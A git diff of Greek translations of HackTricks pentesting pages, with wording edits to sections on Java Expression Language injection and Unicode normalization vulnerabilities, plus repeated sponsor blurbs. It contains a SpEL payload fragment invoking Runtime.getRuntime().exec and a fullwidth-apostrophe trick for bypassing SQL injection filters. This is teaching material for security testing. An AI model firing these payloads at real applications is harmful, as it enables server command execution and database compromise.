Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -221,10 +217,10 @@ X: X
|
|||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγράφου**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,21 +2,21 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team του HackTricks στο AWS)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Εργάζεστε σε μια **εταιρεία κυβερνοασφάλειας**; Θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks**; Ή θέλετε να έχετε πρόσβαση στην **τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF**; Ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Εργάζεστε σε μια **εταιρεία κυβερνοασφάλειας**; Θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks**; ή θέλετε να έχετε πρόσβαση στην **τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF**; Ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Ανακαλύψτε την [**Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Εγγραφείτε** στην [**💬**](https://emojipedia.org/speech-balloon/) **ομάδα Discord** ή στην **ομάδα τηλεγράφου** ή **ακολουθήστε** με στο **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στο **αποθετήριο hacktricks**](https://github.com/carlospolop/hacktricks) **και** [**αποθετήριο hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
* **Εγγραφείτε** στην [**💬**](https://emojipedia.org/speech-balloon/) [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγράφου**](https://t.me/peass) ή **ακολουθήστε** με στο **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στο** [**αποθετήριο hacktricks**](https://github.com/carlospolop/hacktricks) **και** [**αποθετήριο hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
|
@ -28,11 +28,11 @@
|
|||
|
||||
## Βασικές Πληροφορίες
|
||||
|
||||
Η Έκφραση Γλώσσας (EL) είναι ουσιώδης στο JavaEE για τη γέφυρα μεταξύ του επιπέδου παρουσίασης (π.χ., ιστοσελίδες) και της λογικής εφαρμογής (π.χ., διαχειριζόμενα αντικείμενα), επιτρέποντας την αλληλεπίδρασή τους. Χρησιμοποιείται κυρίως σε:
|
||||
Η Έκφραση Γλώσσας (EL) είναι ουσιώδης στο JavaEE για τη γέφυρα μεταξύ του επιπέδου παρουσίασης (π.χ., ιστοσελίδες) και της λογικής εφαρμογής (π.χ., διαχειριζόμενα beans), επιτρέποντας την αλληλεπίδρασή τους. Χρησιμοποιείται κυρίως σε:
|
||||
|
||||
- **JavaServer Faces (JSF)**: Για τη σύνδεση στοιχείων διεπαφής χρήστη με δεδομένα/ενέργειες πίσω από τη σκηνή.
|
||||
- **JavaServer Pages (JSP)**: Για πρόσβαση και επεξεργασία δεδομένων μέσα σε σελίδες JSP.
|
||||
- **Περιβάλλοντα Συμπεράσματος και Εξάρτησης για το Java EE (CDI)**: Για τη διευκόλυνση της αλληλεπίδρασης του επιπέδου ιστού με τα διαχειριζόμενα αντικείμενα.
|
||||
- **Περιβάλλοντα Συμπεράσματος και Εξάρτησης για το Java EE (CDI)**: Για τη διευκόλυνση της αλληλεπίδρασης του επιπέδου ιστού με τα διαχειριζόμενα beans.
|
||||
|
||||
**Περιβάλλοντα Χρήσης**:
|
||||
|
||||
|
@ -42,12 +42,12 @@
|
|||
Η EL είναι παρούσα σε τεχνολογίες JavaEE, αυτόνομα περιβάλλοντα και αναγνωρίζεται μέσω των επεκτάσεων αρχείων `.jsp` ή `.jsf`, σφαλμάτων στο σωρό και όρων όπως "Servlet" στις κεφαλίδες. Ωστόσο, τα χαρακτηριστικά της και η χρήση ορισμένων χαρακτήρων μπορεί να εξαρτώνται από την έκδοση.
|
||||
|
||||
{% hint style="info" %}
|
||||
Ανάλογα με την **έκδοση EL** μερικά **χαρακτηριστικά** μπορεί να είναι **ενεργοποιημένα** ή **απενεργοποιημένα** και συνήθως μερικοί **χαρακτήρες** μπορεί να είναι **απαγορευμένοι**.
|
||||
Ανάλογα με τη **έκδοση της EL** μερικά **χαρακτηριστικά** μπορεί να είναι **ενεργοποιημένα** ή **απενεργοποιημένα** και συνήθως μερικοί **χαρακτήρες** μπορεί να είναι **απαγορευμένοι**.
|
||||
{% endhint %}
|
||||
|
||||
## Βασικό Παράδειγμα
|
||||
|
||||
(Μπορείτε να βρείτε ένα άλλο ενδιαφέρον εκπαιδευτικό μάθημα σχετικά με την EL στο [https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/))
|
||||
(Μπορείτε να βρείτε ένα άλλο ενδιαφέρον εκπαιδευτικό φυλλάδιο σχετικά με την EL στο [https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/))
|
||||
|
||||
Κατεβάστε από το αποθετήριο [**Maven**](https://mvnrepository.com) τα αρχεία jar:
|
||||
|
||||
|
@ -77,7 +77,7 @@ System.out.println(result);
|
|||
}
|
||||
}
|
||||
```
|
||||
Στη συνέχεια, μεταγλωττίστε τον κώδικα (αν δεν έχετε εγκατεστημένο το `javac`, εγκαταστήστε το `sudo apt install default-jdk`):
|
||||
Επόμενο βήμα είναι η συγχώνευση του κώδικα (αν δεν έχετε εγκατεστημένο το `javac`, εγκαταστήστε το `sudo apt install default-jdk`):
|
||||
```java
|
||||
javac -cp commons-lang3-3.9.jar:spring-core-5.2.1.RELEASE.jar:spring-expression-5.2.1.RELEASE.jar:commons-lang3-3.9.jar:commons-logging-1.2.jar:. Main.java
|
||||
```
|
||||
|
@ -88,9 +88,9 @@ Enter a String to evaluate:
|
|||
{5*5}
|
||||
[25]
|
||||
```
|
||||
Σημειώστε πώς στο προηγούμενο παράδειγμα ο όρος `{5*5}` **αξιολογήθηκε**.
|
||||
Σημειώστε ότι στο προηγούμενο παράδειγμα ο όρος `{5*5}` **αξιολογήθηκε**.
|
||||
|
||||
## **Οδηγός βασισμένος στο CVE**
|
||||
## **Βασισμένο σε CVE Οδηγός**
|
||||
|
||||
Ελέγξτε το σε **αυτή την ανάρτηση: [https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a](https://xvnpw.medium.com/hacking-spel-part-1-d2ff2825f62a)**
|
||||
|
||||
|
@ -211,7 +211,7 @@ T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec
|
|||
|
||||
* `applicationScope` - γενικές μεταβλητές της εφαρμογής
|
||||
* `requestScope` - μεταβλητές αιτήματος
|
||||
* `initParam` - μεταβλητές αρχικοποίησης της εφαρμογής
|
||||
* `initParam` - μεταβλητές αρχικοποίησης εφαρμογής
|
||||
* `sessionScope` - μεταβλητές συνεδρίας
|
||||
* `param.X` - τιμή παραμέτρου όπου το Χ είναι το όνομα μιας παραμέτρου http
|
||||
|
||||
|
@ -229,7 +229,7 @@ ${user}
|
|||
${password}
|
||||
${employee.FirstName}
|
||||
```
|
||||
## Διαβίωση WAF
|
||||
## Διαπορεία WAF
|
||||
|
||||
Ελέγξτε [https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/](https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/)
|
||||
|
||||
|
@ -240,13 +240,13 @@ ${employee.FirstName}
|
|||
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools)
|
||||
* [https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt](https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο βασικός στόχος του WhiteIntel είναι η καταπολέμηση των αρπαγών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
Ο βασικός στόχος του WhiteIntel είναι η καταπολέμηση των απαγωγών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
|
@ -259,7 +259,7 @@ ${employee.FirstName}
|
|||
* Εργάζεστε σε μια εταιρεία **κυβερνοασφάλειας**; Θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks**; ή θέλετε να έχετε πρόσβαση στην **τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF**; Ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Εγγραφείτε στη** [**💬**](https://emojipedia.org/speech-balloon/) [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** με στο **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Εγγραφείτε στην** [**💬**](https://emojipedia.org/speech-balloon/) [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** με στο **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ σας υποβάλλοντας PRs στο** [**αποθετήριο hacktricks**](https://github.com/carlospolop/hacktricks) **και** [**αποθετήριο hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,25 +2,25 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team του HackTricks AWS)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Ερυθρού Συνεργείου AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
|
@ -30,9 +30,9 @@
|
|||
|
||||
**Αυτό είναι ένα σύνοψη του:** [**https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/**](https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/). Ρίξτε μια ματιά για περισσότερες λεπτομέρειες (οι εικόνες προέρχονται από εκεί).
|
||||
|
||||
## Κατανόηση Unicode και Κανονικοποίηση
|
||||
## Κατανόηση του Unicode και της Κανονικοποίησης
|
||||
|
||||
Η κανονικοποίηση Unicode είναι ένας διαδικασία που εξασφαλίζει ότι διαφορετικές δυαδικές αναπαραστάσεις χαρακτήρων κανονικοποιούνται στην ίδια δυαδική τιμή. Αυτή η διαδικασία είναι κρίσιμη για την αντιμετώπιση συμβολοσειρών στην προγραμματισμό και την επεξεργασία δεδομένων. Το πρότυπο Unicode ορίζει δύο τύπους ισοδυναμίας χαρακτήρων:
|
||||
Η κανονικοποίηση Unicode είναι ένας διαδικασία που εξασφαλίζει ότι διαφορετικές δυαδικές αναπαραστάσεις χαρακτήρων κανονικοποιούνται στην ίδια δυαδική τιμή. Αυτή η διαδικασία είναι κρίσιμη στην αντιμετώπιση συμβολοσειρών στην προγραμματισμό και την επεξεργασία δεδομένων. Το πρότυπο Unicode ορίζει δύο τύπους ισοδυναμίας χαρακτήρων:
|
||||
|
||||
1. **Κανονική Ισοδυναμία**: Οι χαρακτήρες θεωρούνται κανονικά ισοδύναμοι εάν έχουν την ίδια εμφάνιση και νόημα όταν εκτυπώνονται ή εμφανίζονται.
|
||||
2. **Συμβατική Ισοδυναμία**: Μια αδύναμη μορφή ισοδυναμίας όπου οι χαρακτήρες μπορεί να αντιπροσωπεύουν τον ίδιο αφηρημένο χαρακτήρα αλλά να εμφανίζονται διαφορετικά.
|
||||
|
@ -41,17 +41,17 @@
|
|||
|
||||
### Κύρια Σημεία για την Κωδικοποίηση Unicode
|
||||
|
||||
Η κατανόηση της κωδικοποίησης Unicode είναι κρίσιμη, ειδικά όταν ασχολούμαστε με ζητήματα διαλειτουργικότητας μεταξύ διαφορετικών συστημάτων ή γλωσσών. Εδώ είναι τα κύρια σημεία:
|
||||
Η κατανόηση της κωδικοποίησης Unicode είναι κρίσιμη, ειδικά όταν αντιμετωπίζουμε θέματα διαλειτουργικότητας μεταξύ διαφορετικών συστημάτων ή γλωσσών. Εδώ είναι τα κύρια σημεία:
|
||||
|
||||
* **Σημεία Κώδικα και Χαρακτήρες**: Στο Unicode, κάθε χαρακτήρας ή σύμβολο αντιστοιχίζεται σε αριθμητική τιμή που ονομάζεται "σημείο κώδικα".
|
||||
* **Αναπαράσταση Bytes**: Το σημείο κώδικα (ή χαρακτήρας) αναπαρίσταται από έναν ή περισσότερους bytes στη μνήμη. Για παράδειγμα, οι χαρακτήρες LATIN-1 (συνηθισμένοι στις αγγλόφωνες χώρες) αναπαρίστανται χρησιμοποιώντας ένα byte. Ωστόσο, οι γλώσσες με μεγαλύτερο σύνολο χαρακτήρων χρειάζονται περισσότερα bytes για την αναπαράσταση.
|
||||
* **Κωδικοποίηση**: Αυτός ο όρος αναφέρεται στον τρόπο με τον οποίο οι χαρακτήρες μετατρέπονται σε μια σειρά bytes. Το UTF-8 είναι ένα διαδεδομένο πρότυπο κωδικοποίησης όπου οι χαρακτήρες ASCII αναπαρίστανται χρησιμοποιώντας ένα byte και έως τέσσερα bytes για άλλους χαρακτήρες.
|
||||
* **Επεξεργασία Δεδομένων**: Τα συστήματα επεξεργασίας δεδομένων πρέπει να γνωρίζουν την κωδικοποίηση που χρησιμοποιείται για να μετατρέψουν σωστά τη ροή bytes σε χαρακτήρες.
|
||||
* **Παραλλαγές του UTF**: Εκτός από το UTF-8, υπάρχουν άλλα πρότυπα κωδικοποίησης όπως το UTF-16 (χρησιμοποιώντας τουλάχιστον 2 bytes, έως 4) και το UTF-32 (χρησιμοποιώντας 4 bytes για όλους τους χαρακτήρες).
|
||||
* **Αναπαράσταση Μπάιτ**: Το σημείο κώδικα (ή χαρακτήρας) αναπαρίσταται από έναν ή περισσότερους μπάιτ στη μνήμη. Για παράδειγμα, οι χαρακτήρες LATIN-1 (συνηθισμένοι στις αγγλόφωνες χώρες) αναπαρίστανται χρησιμοποιώντας ένα μπάιτ. Ωστόσο, οι γλώσσες με μεγαλύτερο σύνολο χαρακτήρων χρειάζονται περισσότερα μπάιτ για την αναπαράσταση.
|
||||
* **Κωδικοποίηση**: Αυτός ο όρος αναφέρεται στον τρόπο με τον οποίο οι χαρακτήρες μετατρέπονται σε μια σειρά από μπάιτ. Το UTF-8 είναι ένα διαδεδομένο πρότυπο κωδικοποίησης όπου οι χαρακτήρες ASCII αναπαρίστανται χρησιμοποιώντας ένα μπάιτ και έως τέσσερα μπάιτ για άλλους χαρακτήρες.
|
||||
* **Επεξεργασία Δεδομένων**: Τα συστήματα επεξεργασίας δεδομένων πρέπει να γνωρίζουν την κωδικοποίηση που χρησιμοποιείται για να μετατρέψουν σωστά τη ροή μπάιτ σε χαρακτήρες.
|
||||
* **Παραλλαγές του UTF**: Εκτός από το UTF-8, υπάρχουν άλλα πρότυπα κωδικοποίησης όπως το UTF-16 (χρησιμοποιώντας τουλάχιστον 2 μπάιτ, έως 4) και το UTF-32 (χρησιμοποιώντας 4 μπάιτ για όλους τους χαρακτήρες).
|
||||
|
||||
Είναι κρίσιμο να κατανοήσετε αυτές τις έννοιες για να χειριστείτε αποτελεσματικά και να αντιμετωπίσετε πιθανά ζητήματα που προκύπτουν από την πολυπλοκότητα του Unicode και τις διάφορες μεθόδους κωδικοποίησής του.
|
||||
Είναι κρίσιμο να κατανοήσετε αυτές τις έννοιες για να χειριστείτε αποτελεσματικά και να αντιμετωπίσετε πιθανά θέματα που προκύπτουν από την πολυπλοκότητα του Unicode και τις διάφορες μεθόδους κωδικοποίησής του.
|
||||
|
||||
Ένα παράδειγμα πώς το Unicode κανονικοποιεί δύο διαφορετικά bytes που αναπαριστούν τον ίδιο χαρακτήρα:
|
||||
Ένα παράδειγμα πώς το Unicode κανονικοποιεί δύο διαφορετικά μπάιτ που αναπαριστούν τον ίδιο χαρακτήρα:
|
||||
```python
|
||||
unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "chlo\u00e9")
|
||||
```
|
||||
|
@ -67,9 +67,9 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
|
|||
|
||||
### **Παράκαμψη φίλτρου SQL Injection**
|
||||
|
||||
Φανταστείτε μια ιστοσελίδα που χρησιμοποιεί τον χαρακτήρα `'` για να δημιουργήσει SQL ερωτήματα με την είσοδο του χρήστη. Αυτή η ιστοσελίδα, ως μέτρο ασφαλείας, **διαγράφει** όλες τις εμφανίσεις του χαρακτήρα **`'`** από την είσοδο του χρήστη, αλλά **μετά τη διαγραφή** και **πριν τη δημιουργία** του ερωτήματος, **κανονικοποιεί** χρησιμοποιώντας **Unicode** την είσοδο του χρήστη.
|
||||
Φανταστείτε μια ιστοσελίδα που χρησιμοποιεί τον χαρακτήρα `'` για να δημιουργήσει ερωτήματα SQL με την είσοδο του χρήστη. Αυτή η ιστοσελίδα, ως μέτρο ασφαλείας, **διαγράφει** όλες τις εμφανίσεις του χαρακτήρα **`'`** από την είσοδο του χρήστη, αλλά **μετά τη διαγραφή** και **πριν τη δημιουργία** του ερωτήματος, **κανονικοποιεί** χρησιμοποιώντας **Unicode** την είσοδο του χρήστη.
|
||||
|
||||
Έτσι, ένας κακόβουλος χρήστης θα μπορούσε να εισάγει έναν διαφορετικό χαρακτήρα Unicode ισοδύναμο με το `' (0x27)` όπως το `%ef%bc%87`, όταν η είσοδος κανονικοποιείται, δημιουργείται ένα μονό εισαγωγικό και εμφανίζεται μια **ευπάθεια SQLInjection**:
|
||||
Έτσι, ένας κακόβουλος χρήστης θα μπορούσε να εισάγει έναν διαφορετικό χαρακτήρα Unicode ισοδύναμο με το `' (0x27)` όπως το `%ef%bc%87`, όταν η είσοδος κανονικοποιείται, δημιουργείται ένα μονό εισαγωγικό και εμφανίζεται μια **ευπάθεια SQL Injection**:
|
||||
|
||||
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (699).png>)
|
||||
|
||||
|
@ -115,9 +115,9 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
|
|||
|
||||
### Fuzzing Regexes
|
||||
|
||||
Όταν το backend ελέγχει την είσοδο του χρήστη με ένα regex, είναι πιθανό ότι η είσοδος να είναι κανονικοποιημένη για το regex αλλά όχι για το πού χρησιμοποιείται. Για παράδειγμα, σε ένα Open Redirect ή SSRF το regex ενδέχεται να κανονικοποιεί το σταλθέν URL αλλά στη συνέχεια να το προσπερνά όπως είναι.
|
||||
Όταν το **backend ελέγχει την είσοδο του χρήστη με ένα regex**, είναι πιθανό ότι η **είσοδος** να **κανονικοποιείται** για το **regex** αλλά **όχι** για το πού χρησιμοποιείται. Για παράδειγμα, σε ένα Open Redirect ή SSRF το regex μπορεί να **κανονικοποιεί το σταλθέν URL** αλλά στη συνέχεια να το **χρησιμοποιεί όπως είναι**.
|
||||
|
||||
Το εργαλείο [**recollapse**](https://github.com/0xacb/recollapse) επιτρέπει τη δημιουργία παραλλαγών της εισόδου για να δοκιμάσετε το backend. Για περισσότερες πληροφορίες ελέγξτε το github και αυτήν την [**ανάρτηση**](https://0xacb.com/2022/11/21/recollapse/).
|
||||
Το εργαλείο [**recollapse**](https://github.com/0xacb/recollapse) επιτρέπει τη **δημιουργία παραλλαγών της εισόδου** για να δοκιμάσετε το backend. Για περισσότερες πληροφορίες ελέγξτε το **github** και αυτήν την [**ανάρτηση**](https://0xacb.com/2022/11/21/recollapse/).
|
||||
|
||||
## Αναφορές
|
||||
|
||||
|
@ -125,15 +125,15 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
|
|||
* [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)
|
||||
* [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
